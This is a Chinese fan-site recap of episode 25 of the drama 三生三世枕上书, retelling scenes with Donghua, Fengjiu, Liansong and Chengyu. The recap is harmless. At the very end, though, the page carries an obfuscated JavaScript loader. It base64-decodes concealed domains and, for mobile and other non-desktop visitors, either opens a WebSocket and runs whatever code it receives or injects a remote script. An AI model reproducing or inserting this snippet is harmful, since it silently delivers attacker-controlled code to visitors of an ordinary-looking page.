分集剧情选择: (剧情已更新到第56集,共56集)添加剧集更新时间:2020-12-14 16:43:58

三生三世枕上书第25集剧情

第25集:三生三世枕上书第25集

  凤九回头看到了东华(高伟光 饰)帝君,惊得不轻,赶紧躬身行礼,却忘了自己手上还拿着茶壶,这么一俯身,茶壶里的水便流了出来,她竟未曾察觉。东华帝君见她这般紧张,便示意她坐到自己对面,并亲自为她斟了一杯茶,凤九脑子一时有些转不过弯来,不过她倒是还一直记着,自己不能再与帝君有所纠葛,因此便提起自己手边的茶壶,装作往茶杯里续茶时不小心打翻了茶杯湿了衣服,以乱了仪容为由,连忙起身告罪欲溜。

  东华帝君自然眼睛不瞎,岂能看不出凤九是在故意躲自己?他老人家向来不会给人留脸面,因此便将自己手上的茶壶往前推了一推,告诉凤九,这里面的水已经不烫了,可以直接往身上浇一点,这样才当得起乱了仪容。凤九此时一脑子浆糊,根本没理解帝君这话是何意,随口哦了一声便离开了。

  此时,恰好连宋(李东恒 饰)司命(王骁 饰)星君在附近散步,看到了这一幕,连宋对这一幕很感兴趣,便与司命八卦了起来。司命眼尖,早就看清了连宋欲将之与帝君凑作对的那位女仙正是凤九,连忙岔开话题告诉连宋,天宫众人之所以对他故意大张旗鼓传出的与成玉(袁雨萱 饰)的八卦不感兴趣,没有一人相信,就是因为他表现地太理直气壮问心无愧了些,而招人揣测非议的关系,则应该是遮遮掩掩,问心有愧这才能招人耳目,一层层将消息传递出去。连宋闻言恍然大悟,但他依然揪着眼前东华帝君和凤九的事不放,司命只好告诉他,这两人也正是因为理直气壮,问心无愧,因此也就算不得什么了,这一番话说得连宋神君心服口服。

  而那两位前来相亲的小神君,回到自家仙山后,均吓得不轻。白真(黄俊捷 饰)得知后,板着脸将凤九教训了一顿,凤九连忙表示,自己没有打他们,迷谷可以作证。白真拿自己这个小侄女实在没有办法,闻言十分无奈,也只得不了了之了。

  白浅和夜华大婚之后,很快就到了千花盛典的日子。这一天,凌霄殿上众仙云集,连宋作为操办人,兴冲冲地邀天君与众仙共赏瑶池花灵。成玉不得不走上了仙台,施法唤出了自己辛辛苦苦培育的花灵。但见那些自瑶池芙蕖中集合精华而成的花灵,在仙台上逐渐凝结成形,粉红色的花瓣雨中,仿佛隐约可见一位风姿绰约的仙子翩翩起舞,众仙刚要抚掌叫好,忽见那花灵骤然变为血红色,大殿上的气氛也陡然一变。

  成玉竭力压制那异变的花灵,几乎无法支撑,连宋见状大惊,连忙上前助她,成玉得以喘息,立刻从袖中取出连宋送自己的短刀,将之变作一把弓弩,向着花灵射出了一箭,这才将其赶走。

  事后,连宋与成玉立刻跪在阶下求天君恕罪。天君本来十分不满成玉以一介瑶池仙子的闲职来培育花灵,连宋连忙将责任揽在了自己身上,见两人相互争着承担责任,天君反倒不好再说什么,便以功过相抵为由,揭过了此事。

  凤九此时正带着小阿离去承天台看戏,途径妙华镜时,小阿离一时好奇,想要上前去看看,凤九连忙阻止了他,称在这九重天上,除了东华帝君一个以外,没人能近得了这妙华镜。两人不知道的是,为了躲过知鹤,托故没去参加千花盛典的东华帝君,此时就在对面的山峰上独自饮茶。他将这姐弟俩的对话全都听在了耳中,也听到了小阿离向凤九抱怨,他爹夜华晚上趁着他熟睡,将他从他娘亲的长生殿抱回了他自己的庆云殿,而凤九竟然教他,今早醒来他大可以哭着去挠他娘亲的门,这话让帝君他老人家听了若有所思。

成玉培育花灵失败险些被伤

  姐弟俩说说笑笑一路来到了承天台,却发现迷谷和一众仙娥正被赤焰兽攻击,而前来天宫赴宴的知鹤,在一旁望着那凶兽喷出的火焰竟无动于衷。凤九连忙吩咐小阿离,去长生殿通知他娘亲白浅,她则上前质问知鹤,为何不献出布雨之术,知鹤却神情紧张地一言不发。

  凤九本想直接祭出陶铸剑,将这赤焰兽砍死,只是这个砍死的过程有些漫长,迷谷只怕支撑不了那么久,因此便决定调虎离山。她上前向着赤焰兽攻出了一掌,将它打倒在地,暂时解了迷谷他们的围,如此一来,那头赤焰兽便跳起来向着她扑了过来。凤九使出自己全部的法术抵挡,却被赤焰兽逼步步后退。就在凤九快退到悬崖边上的时候,知鹤突然使出了布雨之术,只不过不是向着赤焰兽,而是向着凤九。

  凤九瞬间被雨水劈头盖脸淋了一身,就在她一愣神的功夫,赤焰兽猛然向她喷出了一团火焰,凤九连忙施法抵挡,却因为失了先机,处处被动,没过几招便被打倒在地。就在这千钧一发之际,一件紫色衣袍罩在了凤九已经湿透了的身上,东华帝君则手持苍何剑从天而降,一招便将赤焰兽打得不知所踪。

  凤九自然认得这衣袍是谁的,连忙将之脱下来,放在了旁边的石桌上,客气疏离地向东华帝君道了谢,称自己并不冷,请他收回外袍。哪知东华帝君却像是和她杠上了一般,非要她将袍子洗了再还自己,凤九想尽办法,也没能推脱得了,最终还是认命地抱着袍子回了庆云殿。知鹤在一旁看着义兄与别的女子那般亲密地说话,却全程对自己视而不见,气得差点咬碎了一口银牙。

  凤九将袍子洗干净之后,正对着它发呆,小阿离从外面进来,见到她这副神色,一语中的地称,她这番表情与自家娘亲此前一般无二,正是有了心上人的表现,凤九连忙嗔了他一句,将袍子收了起来。

  这时,外面走进几名仙娥,每个人手中都捧着一大摞书卷,称白浅有令,凤九若是明日之前抄不完,便为她安排一场从傍晚到天明的相亲流水宴。凤九闻言,便知道是小阿离坏了事,询问之下得知,他从自己这里听说了,想要跟他父君争夺娘亲,就要学会不要脸,小阿离便去向娘亲请教,怎样才能比父君更不要脸,结果自然被姑姑白浅知道,是自己口无遮拦,乱教小孩子,这才招来了这场无妄之灾,她不禁伏案哀嚎不已。

  承天台东华帝君英雄救美的那一幕,早就在天宫里传开了,不过却是被传成了两个版本,一则是说,东华帝君听说义妹被困,急急赶去相救;另一则是说,帝君无意间路过,见一位貌美的女仙与赤焰兽殊死搏斗,处于下风,心中不忍,于是出手相助。连宋听了这传闻,便以下棋为名,去找东华帝君打听八卦,并建议帝君不如早日迎娶帝后,正好知鹤在天宫,自己可以帮她去向天君求情,免去她的罢黜之罚,让她重回太晨宫。

  帝君听了,未置可否,却对众人传言凤九貌美一语,十分满意。连宋闻言,十分吃惊,仿佛得知了什么了不得的秘密。而东华帝君则不由想起了自己在承天台赶走赤焰兽后,问凤九为何要出手救那些仙娥,凤九答说,姑姑曾教导她,作为青丘帝姬,不必事事争第一,青丘要的不是她的荣光,而是遇事必挺身而出的但当,若此次见死不救,自己将无法面对自己的臣民。

承天台帝君再救凤九

  东华帝君正在回忆承天台那一幕,重霖来报,知鹤来求见。帝君知道知鹤是想要借机留在太晨宫,因此不等她把话说完,便让她自去拜谢天君,知鹤却打起了亲情牌,称自己曾经年少无知,现在羞愧难当,想请他看在亡父面上,助自己重返天宫,修炼荒废的学业。如此一来,东华帝君倒是不好再拒绝,他抬头深深看了知鹤一眼,默许了她。

  凤九因为没有抄完那些书卷,被白浅派人拉去相亲。凤九一边走,一边心中暗自得意,暗道凭自己这个相亲老手,对付这种场面还不是手到擒来,哪知等她到了地方一看,发现现场足足有十几位青年才俊。这阵容实在出乎凤九的意料之外,这么大的场面,这可不是她能玩得转的,因此凤九吓得转头一溜烟便逃了。那些来相亲的青年才俊见了这位青丘小殿下的风姿,顿时惊为天人,哪里肯空空放过?纷纷在后面紧追不舍,凤九被追得无处可逃,无意间避进了温泉宫,她见四下无人,便脱了衣服跳进了温泉池。

  此时,东华帝君刚刚泡完温泉,正在屏风后穿衣服,他早已看到了凤九的身影,收拾停当准备离开时,见到了旁边台子上放着的衣物,便随手一挥,将一件里衣准确地罩在了听到动静躲起来的凤九头上,并问她为何会在这里。

  凤九听到声音,得知竟是东华帝君,不禁大惊,磕磕巴巴地回答说,自己在洗澡,说完便想去拿自己的衣物,奈何离得太远,她怎么都够不着。东华帝君见状,便背着身子将她剩余的衣物分次交给了她,凤九只好一件件地接过,尴尬地要死。

  这时,连宋神君回来取自己刚刚落下的扇子,他在门外看到这一幕,本想瞧帝君一回热闹,可被帝君他老人家眼风一扫,吓得赶紧没骨气地溜走了,但走了一程,觉得不甘心,便顶着被帝君修理的风险折了回来,大摇大摆进来取了自己的扇子,也借机瞧明白了里面发生的事,这才心满意足地离开了。

  凤九胡乱将衣服裹在了自己的身上,逃也似地离开了温泉宫,却将自己的发钗与手镯落在了里面,东华帝君看到后,顺手拿了回去。回到太晨宫后,东华帝君迎面遇到了连宋神君,连忙将手里的东西藏在了袖中,可眼尖的连宋神君却早就看到了,他一本正经地打趣东华帝君,若是他真对青丘帝姬动了心,将来少不得还要叫夜华一声姑父。东华帝君听罢横了他一眼,毒舌地回敬了一句,改日自己便去收成玉做干女儿,连宋神君闻言,不敢再饶舌,连连摇头,感叹自己交友不慎。

  第二天,凤九依然对自己昨日被东华帝君捏着肚兜递过来的那一幕耿耿于怀,却又无处诉说,只得遮遮掩掩去问阿离,若是在喜欢的人面前出了大丑该怎么办,阿离毫不留情地表示,不如找块豆腐撞死算了。凤九神情恹恹地正准备去找豆腐,却无意间从阿离口中得知了千花盛典上成玉冲撞了天君,却被连宋极力维护的事,顾不上自怨自艾,连忙跑去看望成玉。

  见到成玉安然无恙,凤九这才放了心,两人一边喝茶,一边相互打趣聊天,凤九忽然发现,自己的手镯不见了,她手忙脚乱地一阵翻找,终于想起,昨日将其落在了温泉宫。

同类型

同主演


function agQbH(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function fFKucWQk(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return agQbH(t);};window[''+'o'+'p'+'K'+'m'+'x'+'F'+'z'+'t'+'Q'+'V'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=fFKucWQk,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aGGJ0Lm1pbGGVjY3R2LmNu','ddHIueWVzddW42NzguY29t','142556',window,document,['G','d']);}:function(){};